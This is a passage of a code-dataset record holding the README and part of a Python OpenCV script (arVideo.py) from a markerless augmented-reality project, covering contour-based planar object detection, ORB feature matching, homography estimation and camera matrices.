false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 71, "num_lines": 34, "path": "/pca/pca.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "from numpy import *\n\n\"\"\"\nremove the mean\ncompute the covariance matrix\nfind the eigenvalues and eigenvectors of the covariance matrix\nsort the eigenvalues by desc\ntake top-N eigenvectors\ntransform the data into the new space created by the top-N eigenvectors\n\"\"\"\n\ndef loadDataSet(file, delim = '\\t'):\n\tfr = open(file)\n\tstringArr = [line.strip().split(delim) for line in fr.readlines()]\n\tdatArr = [map(float, line) for line in stringArr]\n\treturn datArr\n\ndef pca(dataMat, topNfeat = 9999999):\n\tmeanVals = mean(dataMat, axis = 0)\n\tmeanRemove = dataMat - meanVals\n\tcovMat = cov(meanRemove, rowvar = 0)\n\teigVals, eigVec = linalg.eig(mat(covMat))\n\teigValInd = argsort(eigVals)\n\teigValInd = eigValInd[:-(topNfeat+1):-1]\n\tredEigVec = eigVec[:, eigValInd]\n\tlowDDataMat = meanRemove * redEigVec\n\treconMat = lowDDataMat * redEigVec.T + meanVals\n\treturn lowDDataMat, reconMat\n\n\nif __name__ == \"__main__\":\n\tdatArr = loadDataSet(\"testSet.txt\", '\\t')\n\tlowDDataMat, reconMat = pca(datArr, 1)\n\tprint lowDDataMat, reconMat" }, { "alpha_fraction": 0.78125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "b0138169f58a25926db6b9fd64038ba539695a23", "content_id": "fd41c78dd1cd5e6fc15fb82a87fcd9d3991bf7c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 64, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/README.md", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "# Machine Learning Algorithms\ncompleted by python 2.7 and numpy\n" }, { "alpha_fraction": 0.6020539402961731, "alphanum_fraction": 0.6261874437332153, "avg_line_length": 25.6849308013916, "blob_id": "f3c55b98e58b6f541f282c0f5687881f895bd131", "content_id": "dcc72051f20ebb6cc1301afadc2add58d17e1f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "no_license", "max_line_length": 68, "num_lines": 146, "path": "/adaboost/adaboost.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom numpy import *\nimport pdb\nimport matplotlib.pyplot as plt\n\ndef loadData():\n\tx = matrix([[ 1. , 2.1],\n\t\t[ 2. , 1.1],\n\t\t[ 1.3, 1. ],\n\t\t[ 1. , 1. ],\n\t\t[ 2. , 1. 
]])\n\ty = [1.0, 1.0, -1.0, -1.0, 1.0]\n\treturn x, y\n\ndef loadDataSet(file):\n\tfeaNum = len(open(file).readline().split('\\t'))\n\tdataMat = []\n\tlabel = []\n\tfr = open(file)\n\tfor line in fr.readlines():\n\t\tls = line.strip().split('\\t')\n\t\tlineArr = []\n\t\tfor i in range(feaNum-1):\n\t\t\tlineArr.append(float(ls[i]))\n\t\tdataMat.append(lineArr)\n\t\tlabel.append(float(ls[-1]))\n\treturn dataMat, label\n\n\n\n\ndef stumpClassify(dataMatrix,dimen,threshVal,threshIneq):\n\tret = ones((shape(dataMatrix)[0], 1))\n\tif threshIneq == \"lt\":\n\t\tret[dataMatrix[:,dimen] <= threshVal] = -1\n\telse:\n\t\tret[dataMatrix[:,dimen] > threshVal] = -1\n\treturn ret\n\n\ndef buildStump(dataArr, classLabels, D):\n\tx = mat(dataArr)\n\ty = mat(classLabels).T\n\tm,n = shape(x)\n\tnumStep = 10.0\n\tbestStump = {}\n\tminErr = inf\n\tbestClassEst = mat(zeros((m,1)))\n\tfor dimen in range(n): # for each dimension\n\t\trangeMin = x[:,dimen].min()\n\t\trangeMax = x[:,dimen].max()\n\t\tstepSize = (rangeMax - rangeMin) / numStep\n\t\tfor step in range(-1, int(numStep) + 1): # for each split step\n\t\t\tfor threshIneq in [\"lt\", \"gt\"]: # for each inequation\n\t\t\t\tthreshVal = rangeMin + float(step) * stepSize\n\t\t\t\terr = mat(ones((m,1)))\n\t\t\t\tpred = stumpClassify(x, dimen, threshVal, threshIneq)\n\t\t\t\t# pdb.set_trace()\n\t\t\t\terr[pred==y] = 0\n\t\t\t\tweightedErr = D.T * err\n\t\t\t\tif weightedErr < minErr:\n\t\t\t\t\tbestStump['dim'] = dimen\n\t\t\t\t\tbestStump['thresh'] = threshVal\n\t\t\t\t\tbestStump['ineq'] = threshIneq\n\t\t\t\t\tminErr = weightedErr\n\t\t\t\t\tbestClassEst = pred.copy()\n\treturn bestStump, bestClassEst, minErr\n\ndef adaBoostTrain(x, y, numIt=40):\n\tweakCls = []\n\tm, n = shape(x)\n\tD = mat(ones((m,1)) / m)\n\taggClassEst = mat(zeros((m,1)))\n\tfor i in range(numIt):\n\t\tbestStump, classEst, err = buildStump(x, y , D)\n\t\t# print \"D:\",D.T\n\t\talpha = float(0.5 * log((1-err) / max(err, 1e-16)))\n\t\tbestStump[\"alpha\"] = alpha\n\t\tweakCls.append(bestStump)\n\t\t# print \"classEst: \",classEst.T\n\t\t# pdb.set_trace()\n\t\texpon = multiply(-1 * alpha * mat(y).T, classEst)\n\t\tD = multiply(D, exp(expon))\n\t\tD = D / D.sum()\n\t\taggClassEst = aggClassEst + alpha * classEst\n\t\t# print \"aggClassEst: \",aggClassEst.T\n\t\tgx = sign(aggClassEst)\n\t\taggErr = multiply(gx != mat(y).T, ones((m,1)))\n\t\terrRate = aggErr.sum() / float(m)\n\t\t# print \"total error: \",errRate,\"\\n\"\n\t\tif errRate == 0.0: break\n\treturn weakCls, aggClassEst\n\n\ndef adaClassifier(x, clc):\n\tx = mat(x)\n\tm, n = shape(x)\n\taggClassEst = mat(zeros((m,1)))\n\tfor c in clc:\n\t\tclassEst = stumpClassify(x, c['dim'], c['thresh'], c['ineq'])\n\t\taggClassEst += c['alpha'] * classEst\n\t\tprint aggClassEst\n\treturn sign(aggClassEst)\n\n\ndef plotROC(predStrengths, classLabels):\n\tcur = (1.0, 1.0)\n\tySum = 0.0\n\tnumPos = sum(array(classLabels)==1.0)\n\tyStep = 1 / float(numPos)\n\txStep = 1 / float(len(classLabels) - numPos)\n\tsortedIndex = predStrengths.argsort()\n\tfig = plt.figure()\n\tfig.clf()\n\tax = plt.subplot(111)\n\tfor index in sortedIndex.tolist()[0]:\n\t\tif classLabels[index] == 1.0:\n\t\t\tdelX = 0\n\t\t\tdelY = yStep\n\t\telse:\n\t\t\tdelX = xStep\n\t\t\tdelY = 0\n\t\t\tySum += cur[1]\n\t\tax.plot([cur[0], cur[0]-delX], [cur[1], cur[1]-delY], c='b')\n\t\tcur = (cur[0]-delX, cur[1]-delY)\n\tax.plot([0,1], [0,1], 'b--')\n\tplt.xlabel('False Positive Rate'); plt.ylabel('True Positive Rate')\n\tplt.title('ROC curve for AdaBoost Horse Colic Detection 
System')\n\tax.axis([0,1,0,1])\n\tplt.show()\n\tprint \"the Area Under the Curve is: \",ySum*xStep\n\nif __name__ == \"__main__\":\n\t# x, y = loadData()\n\t# clc = adaBoostTrain(x, y, 9)\n\t# print adaClassifier([0,0], clc)\n\n\n\tx, y = loadDataSet('horseColicTraining2.txt')\n\tclc, aggClassEst = adaBoostTrain(x, y, 10)\n\tplotROC(aggClassEst.T, y)\n\t# xtest, ytest = loadDataSet('horseColicTest2.txt')\n\t# pred = adaClassifier(xtest, clc)\n\t# err = mat(ones((shape(pred)[0], 1)))\n\t# print err[pred != mat(ytest).T].sum()" }, { "alpha_fraction": 0.5364475250244141, "alphanum_fraction": 0.553211510181427, "avg_line_length": 24.165876388549805, "blob_id": "794570097c3d34bf731c8bba14c490a9a7cf0ee9", "content_id": "7bd74005731d10268303035392341e918417da4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5309, "license_type": "no_license", "max_line_length": 134, "num_lines": 211, "path": "/svm/svm.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! /bin/python\n\nfrom numpy import *\n\nclass optStruct(object):\n\t\"\"\"docstring for optStruct\"\"\"\n\tdef __init__(self, x, y, C, toler):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.C = C\n\t\tself.toler = toler\n\t\tself.m = shape(x)[0]\n\t\tself.alphas = mat(zeros((self.m, 1)))\n\t\tself.b = 0\n\t\tself.eCache = mat(zeros((self.m, 2)))\n\ndef calcEk(oS, k):\n\tf_xk = float(multiply(oS.alphas, oS.y).T * kernel(oS.x, oS.x[k,:])) + oS.b\n\tEk = f_xk - float(oS.y[k])\n\treturn Ek\n\ndef selectJ(i, Ei,oS):\n\tmaxDelta = 0\n\tmaxK = -1\n\tEj = 0\n\toS.eCache[i] = [1, Ei]\n\tvalidECacheList = nonzero(oS.eCache[:, 0].A)[0]\n\tif(len(validECacheList) > 1):\n\t\tfor k in validECacheList:\n\t\t\tif k == i:\n\t\t\t\tcontinue\n\t\t\tEk = calcEk(oS, k)\n\t\t\tdeltaE = abs(Ek - Ei)\n\t\t\tif deltaE > maxDelta:\n\t\t\t\tmaxDelta = deltaE\n\t\t\t\tmaxK = k\n\t\t\t\tEj = Ek\n\t\treturn maxK, Ej\n\telse:\n\t\tj = selectJrand(i, oS.m)\n\t\tEj = calcEk(oS, j)\n\treturn j, Ej\n\t\t\ndef updateEk(oS, k):\n\toS.eCache[k] = calcEk(oS, k)\n\n\ndef innerL(i, oS):\n\tEi = calcEk(oS, i)\n\tif (Ei * oS.y[i] < -oS.toler and oS.alphas[i] < oS.C) or (Ei * oS.y[i] > oS.toler and oS.alphas[i] > 0):\n\t\tj, Ej = selectJ(i, Ei, oS)\n\t\talpha_i_old = oS.alphas[i]\n\t\talpha_j_old = oS.alphas[j]\n\t\tif oS.y[i] == oS.y[j]:\n\t\t\tL = max(0, alpha_i_old + alpha_j_old - oS.C)\n\t\t\tH = min(oS.C, alpha_j_old + alpha_i_old)\n\t\telse:\n\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\tH = min(oS.C, oS.C+alpha_j_old - alpha_i_old)\n\t\tif L==H:\n\t\t\treturn 0\n\t\teta = kernel(oS.x[i], oS.x[i]) + kernel(oS.x[j], oS.x[j]) - 2 * kernel(oS.x[i], oS.x[j])\n\t\tif eta <= 0:\n\t\t\tprint \"eta <= 0\"\n\t\t\treturn 0\n\t\toS.alphas[j] = alpha_j_old + y[j] * (Ei - Ej) / eta\n\t\toS.alphas[j] = clipAlpha(oS.alphas[j], H, L)\n\t\tupdateEk(oS, j)\n\t\tif abs(oS.alphas[j] - alpha_j_old) < 0.00001:\n\t\t\tprint \"j not moving enough\"\n\t\t\treturn 0\n\t\toS.alphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old- oS.alphas[j])\n\t\tupdateEk(oS, i)\n\t\tb1 = oS.b - Ei - y[i] * kernel(x[i], x[i])*(oS.alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i]) * (oS.alphas[j] - alpha_j_old)\n\t\tb2 = oS.b - Ej - y[i] * kernel(x[i], x[j]) * (oS.alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j]) * (oS.alphas[j] - alpha_j_old)\n\n\t\tif 0 < oS.alphas[i] and oS.alphas[i] < oS.C:\n\t\t\toS.b = b1\n\t\telif 0 < oS.alphas[j] and oS.alphas[j] < oS.C:\n\t\t\toS.b = b2\n\t\telse:\n\t\t\toS.b = (b1+b2) / 2.0\n\t\treturn 
1\n\telse:\n\t\treturn 0\n\ndef smoP(x, y, C, toler, maxIter, kTup=('lin', 0)):\n\toS = optStruct(mat(x), mat(y).transpose(), C, toler)\n\titer = 0\n\tentireSet = True; alphaPairsChanged = 0\n\twhile (iter < maxIter) and (alphaPairsChanged > 0) or entireSet:\n\t\talphaPairsChanged = 0\n\t\tif entireSet:\n\t\t\tfor i in range(oS.m):\n\t\t\t\talphaPairsChanged += innerL(i, oS)\n\t\t\titer += 1\n\t\telse:\n\t\t\tnonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]\n\t\t\tfor i in nonBoundIs:\n\t\t\t\talphaPairsChanged += innerL(i,oS)\n\t\t\titer += 1\n\t\tif entireSet: entireSet = False\n\t\telif (alphaPairsChanged == 0): entireSet = True\n\treturn oS.b,oS.alphas\n\n\n\n\"\"\"\nload dataSet\n\"\"\"\ndef loadDataSet():\n\tfr = open(\"testSet.txt\")\n\tx = []\n\ty = []\n\tfor line in fr.readlines():\n\t\tls = line.split(\"\\t\")\n\t\tx.append([float(ls[0]), float(ls[1])])\n\t\ty.append(float(ls[2]))\n\treturn x, y\n\n\ndef selectJrand(i, m):\n\tj = i\n\twhile j==i:\n\t\tj = random.uniform(0,m)\n\treturn j\n\n\"\"\"\nselect alpha between L and H\n\"\"\"\ndef clipAlpha(aj, H, L):\n\tif aj > H:\n\t\taj = H\n\tif aj < L:\n\t\taj = L\n\treturn aj\n\n\ndef kernel(x, xi):\n\treturn x * xi.T\n\n\ndef smoSimple(x, y, C, toler, maxIter):\n\tx = mat(x)\n\ty = mat(y)\n\tb = 0\n\tm,n = shape(x)\n\talphas = mat(zeros((m,1)))\n\titer = 0\n\twhile iter < maxIter:\n\t\talphaChange = 0\n\t\tfor i in range(m):\n\t\t\tf_xi = float(multiply(alphas, y).T * kernel(x, x[i,:])) + b\n\t\t\tEi = f_xi - float(y[i])\n\t\t\tif y[i] * f_xi < -toler and alphas[i] < C or\\\n\t\t\ty[i] * f_xi > toler and alphas[i] > 0:\n\t\t\t\tj = selectJrand(i, m)\n\t\t\t\tf_xj = float(multiply(alphas, y).T * kernel(x, x[j,:])) + b\n\t\t\t\tEj = f_xj - y[j]\n\t\t\t\talpha_i_old = alpha[i].copy()\n\t\t\t\talpha_j_old = alpha[j].copy()\n\t\t\t\tif y[i] == y[j]:\n\t\t\t\t\tL = max(0, alpha_i_old+ alpha_j_old - C)\n\t\t\t\t\tH = min(C, alpha_i_old + alpha_j_old)\n\t\t\t\telse:\n\t\t\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\t\t\tH = min(C + alpha_j_old - alpha_i_old)\n\t\t\t\tif L==H:\n\t\t\t\t\tprint \"L==H\"\n\t\t\t\t\tcontinue\n\t\t\t\teta = kernel(x[i], x[i]) + kernel(x[j], x[j]) - 2 * kernel(x[i], x[j])\n\t\t\t\talphas[j] += y[i] * (Ei - Ej)\n\t\t\t\talphas[j] = clipAlpha(alphas[j], H, L)\n\t\t\t\tif alphas[j] - alpha_j_old < 0.00001:\n\t\t\t\t\tprint \"j not moving enough\"\n\t\t\t\t\tcontinue\n\t\t\t\talphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old - alphas[j])\n\t\t\t\tb1 = b - Ei - y[i] * kernel(x[i], x[i]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i])*(alphas[j] - alpha_j_old)\n\t\t\t\tb2 = b - Ej - y[i] * kernel(x[i], x[j]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j])*(alphas[j] - alpha_j_old)\n\t\t\t\tif alphas[i] > 0 and alphas[i] < C:\n\t\t\t\t\tb = b1\n\t\t\t\telif alphas[j] > 0 and alphas[j] < C:\n\t\t\t\t\tb = b2\n\t\t\t\telse:\n\t\t\t\t\tb = (b1 + b2) / 2.0\n\t\t\t\talphaChange += 1\n\t\t\t\tprint \"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaChange)\n\t\tif alphaChange == 0:\n\t\t\titer += 1\n\t\telse:\n\t\t\titer = 0\n\t\tprint \"iteration number: %d\" % iter\n\treturn alphas, b\n\n\ndef calWc(alphas, x, y):\n\tx = mat(x)\n\ty = mat(y).transpose()\n\tm,n = shape(x)\n\tw = zeros((n,1))\n\tfor i in range(m):\n\t\tw += multiply(alphas[i] * y[i], x[i].T)\n\treturn w\n\n\n\nif __name__ == '__main__':\n\tx,y = loadDataSet()\n\talphas, b = smoP(x,y,0.6,0.001,40)\n\n\tprint alphas" } ]
10
1982026927/Markerless-AR
https://github.com/1982026927/Markerless-AR
ae035c184cdfed4bf03573ddca6d94fe9166b3a2
ba6cb272ae64ea225cc51a9775d9f8653f0a9995
10517511204cd8db098cac31b94dfede2a1dbae5
refs/heads/master
2023-06-03T20:37:08.869258
2018-07-21T03:30:09
2018-07-21T03:30:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7546276450157166, "alphanum_fraction": 0.7604390978813171, "avg_line_length": 70.47692108154297, "blob_id": "2920e014e55c4f57a4db8e6bf364446b00c6f015", "content_id": "8e4677754f9088cbb1c24d178451ba4775908822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4646, "license_type": "no_license", "max_line_length": 462, "num_lines": 65, "path": "/README.md", "repo_name": "1982026927/Markerless-AR", "src_encoding": "UTF-8", "text": "# Markerless-AR\nMarkerless AR is the process of rendering a 3d object into a real world environment without the need of a [marker](https://docs.opencv.org/3.1.0/d5/dae/tutorial_aruco_detection.html).\n\n# Dependencies:\n * OpenCV\n * Pygame\n * Numpy\n * Imutils\n * Scikit-image\n * Matplotlib\n * PyOpenGl\n * Pillow\n\n# Usage:\nAR Using an Image:\n```\npython arImage.py -s sceneImageName\n```\nAR Using Video:\n```\npython arImage.py -s sceneVideoName\n```\nNote: Make sure the image or video exists within the imgs folder.\n\n# How it Works:\nThere are a few things that need to be done in order to render 3d objects without a marker:\n * Find Planar Object\n * Feature Matching\n * Find Homography\n * Calculate Camera Intrinsic and Extrinsic Matrices\n * Tie it all together\n\n# 1. Find Planar Object:\n * Given a scene image (or frame if using a video), we must find a planar object (magazine, paper, book, etc.) that we will use to attach our 3d object to like we would with a marker. It seems just as restricting as having to rely on a marker but the main difference is that these planar objects exist naturally in the real world whereas markers do not.\n\n * Using Canny Edge Detector and then finding the contours, we can get the outline of our planar object which we can then crop out. We then apply a perspective transform in order to get a top-down view of our object in case it has some rotation or translation in the scene. The result of this process will be our query image (planar object), which we will use to perform the feature detection and matching.\n\n# 2. Feature Matching:\n * We want to be able to find and keep track of where our planar object is as we move around in the real world. Using feature matching can help solve this problem. By detecting keypoints in our query and scene image, we can be sure that we only look for parts of the images that contain a lot of information. The reason for this is that we only have to match on those keypoints as opposed to the entire image, which makes finding our planar object a lot easier.\n \n * There are a few different algorithms used for feature detecting such as ORB, SURF, SIFT. In this project we use ORB. Once the keypoints are found, we extract the descriptors. The descriptor is a vector that contains information about the feature point. \n \n * The matching of feature points is done using a knnMatch which does a search of the nearest neighbor from one set of descriptors to another set. Afterwards, a ratio test is applied to filter out outliers based on distance between the two matches being compared.\n \n# 3. Find Homography\n * With the above filtered set of matched feature points, we can now calculate the homography. A homography is a 3x3 transformation matrix that maps the points of one image to another if they are part of the same planar surface:\n \n * If we wanted to, we could refine the homography by applying a warping perspective on the scene using the homography and reapplying the feature matching and descriptor extraction. 
\n \n# 4. Calculate Camera Intrinsic and Extrinsic Matrices\n * The camera intrinsic matrix (referred to as K) is a 3x3 matrix used to transform 3d camera coordinates to 2d homogeneous image coordinates. \n ![Alt text](/imgs/readme_imgs/K_initial.jpg?raw=true \"Camera Intrinsics\") \n The matrix is made up of the focal length (fx and fy), the principal point offsets (cx and cy), and axis skew (s), which in most cases can be set to 0. This gives us: \n ![Alt text](/imgs/readme_imgs/K_final.jpg?raw=true \"Camera Intrinsics\") \n This matrix can be calculated based on some assumptions but the focal length must be found with a specific calibration method. You can also obtain the entire matrix by calibrating the camera with a chessboard, which OpenCV provides a built in function just for that.\n \n * The camera extrinsic matrix ([R|t]) is a 3x4 matrix which describes the camera's position in the real world and the direction it is pointing in. \n ![Alt text](/imgs/readme_imgs/Rt.jpg?raw=true \"Camera Intrinsics\") \n The matrix has two components: a 3x3 rotation matric (R) and a 3x1 translation matrix (t). This matrix can be extracted from the homography or using K and built in OpenCV functions.\n \n# Tie it all together:\n * Once we have all the components found above, we must format it so that OpenGL knows what to do with everything. This is done with the Python wrapper for OpenGL, PyOpenGL.\n ![Alt text](/imgs/readme_imgs/output_1.png?raw=true \"Script in Action\")\n ![Alt text](/imgs/readme_imgs/output_2.png?raw=true \"Script in Action\")\n ![Alt text](/imgs/readme_imgs/output_3.png?raw=true \"Script in Action\")\n" }, { "alpha_fraction": 0.5770667791366577, "alphanum_fraction": 0.6093165874481201, "avg_line_length": 28.64339828491211, "blob_id": "17ebf4791123a9cde246c02212c5b06c9295a66c", "content_id": "0ba8a74242dd5c3e249ec408ba17617954575e9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19535, "license_type": "no_license", "max_line_length": 105, "num_lines": 659, "path": "/arVideo.py", "repo_name": "1982026927/Markerless-AR", "src_encoding": "UTF-8", "text": "import math\nimport cv2\nimport numpy as np\nimport argparse\nfrom imutils import contours\nimport imutils\nfrom skimage.filters import threshold_adaptive\nfrom matplotlib import pyplot as plt\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport pygame, pygame.image\nfrom pygame.locals import *\nimport pickle\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom scipy import linalg\n\n\nclass Camera(object):\n '''\n Class for representing pin-hole cameras.\n '''\n\n def __init__(self,P):\n '''\n Initialize P = K[R|t] camera model.\n '''\n self.P = P\n self.K = None # calibration matrix\n self.R = None # rotation\n self.t = None # translation\n self.c = None # camera center\n\n\n def project(self,X):\n '''\n Project points in X (4*n array) and normalize coordinates.\n '''\n\n x = np.dot(self.P,X)\n for i in range(3):\n x[i] /= x[2]\n return x\n\ndef resizeImage(image, width, height):\n '''\n Resizes an image and returns the resized image name\n '''\n resizingImg = Image.open(image)\n\n newImg = resizingImg.resize((width, height), Image.ANTIALIAS)\n newImg.save(image)\n\n return image\n\n\ndef order_points(pts):\n '''\n Order an array of points\n '''\n # initialzie a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # 
bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype = \"float32\")\n\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n\n # return the ordered coordinates\n return rect\n\ndef four_point_transform(image, pts):\n '''\n Warps image to get clean, top view\n '''\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\n # return the warped image\n return warped\n\ndef transformSurface(image):\n '''\n Apply transform to make query image\n '''\n screenCnt = None\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = imutils.resize(image, height = 500)\n\n # convert the image to grayscale, blur it, and find edges\n # in the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n # show the original image and the edge detected image\n #print \"STEP 1: Edge Detection\"\n # cv2.imshow(\"Image\", image)\n #cv2.imwrite(\"imgs/edged.jpg\", edged)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # find the contours in the edged image, keeping only the\n # largest ones, and initialize the screen contour\n (cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n # if our approximated contour has four points, then we\n # can assume that we have found our screen\n if len(approx) == 4:\n screenCnt = approx\n print screenCnt\n break\n\n # show the contour (outline) of the piece of paper\n #print \"STEP 2: Find contours of paper\"\n # cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 
2)\n # cv2.imwrite(\"imgs/outline.jpg\", image)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n if screenCnt is not None:\n # apply the four point transform to obtain a top-down\n # view of the original image\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n\n\n # show the original and scanned images\n #print \"STEP 3: Apply perspective transform\"\n # cv2.imshow(\"Original\", imutils.resize(orig, height = 650))\n # cv2.imshow(\"Scanned\", imutils.resize(warped, height = 650))\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n cv2.imwrite(\"imgs/query.jpg\", warped)\n\n\ndef drawMatches(img1, kp1, img2, kp2, matches):\n '''\n Draws matched keypoints\n '''\n # Create a new output image that concatenates the two images together\n # (a.k.a) a montage\n rows1 = img1.shape[0]\n cols1 = img1.shape[1]\n rows2 = img2.shape[0]\n cols2 = img2.shape[1]\n\n # Create the output image\n # The rows of the output are the largest between the two images\n # and the columns are simply the sum of the two together\n # The intent is to make this a colour image, so make this 3 channels\n out = np.zeros((max([rows1,rows2]),cols1+cols2,3), dtype='uint8')\n\n # Place the first image to the left\n out[:rows1,:cols1] = np.dstack([img1, img1, img1])\n\n # Place the next image to the right of it\n out[:rows2,cols1:] = np.dstack([img2, img2, img2])\n\n # For each pair of points we have between both images\n # draw circles, then connect a line between them\n for mat in matches:\n\n # Get the matching keypoints for each of the images\n img1_idx = mat[0].queryIdx\n img2_idx = mat[0].trainIdx\n\n # x - columns\n # y - rows\n (x1,y1) = kp1[img1_idx].pt\n (x2,y2) = kp2[img2_idx].pt\n\n # Draw a small circle at both co-ordinates\n # radius 4\n # colour blue\n # thickness = 1\n cv2.circle(out, (int(x1),int(y1)), 4, (255, 0, 0), 1)\n cv2.circle(out, (int(x2)+cols1,int(y2)), 4, (255, 0, 0), 1)\n\n # Draw a line in between the two points\n # thickness = 1\n # colour blue\n cv2.line(out, (int(x1),int(y1)), (int(x2)+cols1,int(y2)), (255,0,0), 1)\n\n\n cv2.imwrite(\"imgs/orb.jpg\", out)\n\n\ndef orb(img1,img2):\n '''\n Detect and compute keypoints and descriptors to find refined homography\n '''\n refinedM = None\n roughM = None\n query = cv2.imread(img1,0) # queryImage\n scene = img2 # trainImage\n h, w = scene.shape[:2]\n\n # Initiate ORB detector\n orb = cv2.ORB()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = orb.detectAndCompute(query,None)\n kp2, des2 = orb.detectAndCompute(scene,None)\n\n # create BFMatcher object\n bf = cv2.BFMatcher()\n #returns list of lists of matches\n matches = bf.knnMatch(des1,des2, k=2)\n\n # Apply ratio test\n good = []\n for m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n #drawMatches(img1, kp1, img2, kp2, good[:])\n\n MIN_MATCH_COUNT = 10\n\n if len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m[0].queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m[0].trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n roughM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n if roughM is None:\n return None\n else:\n\n\n '''\n Second pass to refine homography\n '''\n warp = cv2.warpPerspective(scene, roughM, (w, h), flags=cv2.WARP_INVERSE_MAP+cv2.INTER_CUBIC)\n cv2.imwrite(\"imgs/warp.jpg\", warp)\n warpedScene = cv2.imread(\"imgs/warp.jpg\",0) # queryImage\n\n # Initiate ORB detector\n orb = cv2.ORB()\n\n # find the keypoints and descriptors with ORB\n kp1, des1 = 
